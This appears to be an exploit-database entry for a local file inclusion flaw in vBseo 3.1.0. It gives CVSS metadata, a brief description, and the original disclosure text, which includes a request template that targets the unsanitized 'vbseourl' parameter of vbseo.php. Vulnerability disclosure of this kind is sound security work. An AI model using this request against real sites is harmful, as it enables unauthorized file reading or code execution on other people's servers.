header-logo
Suggest Exploit
vendor:
vBseo
by:
ViRuSMaN
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: vBseo
Affected Version From: 3.1.0
Affected Version To: 3.1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

vBseo v3.1.0 Local File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'vbseourl' parameter in 'vbseo.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system with the privileges of the webserver process.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

======================================================================
        [»] vBseo v3.1.0 Local File Include Vulnerability
======================================================================

    [»] Script:             [ vBseo ]
    [»] Language:           [ PHP ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://server/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]

Author: ViRuSMaN <-

###########################################################################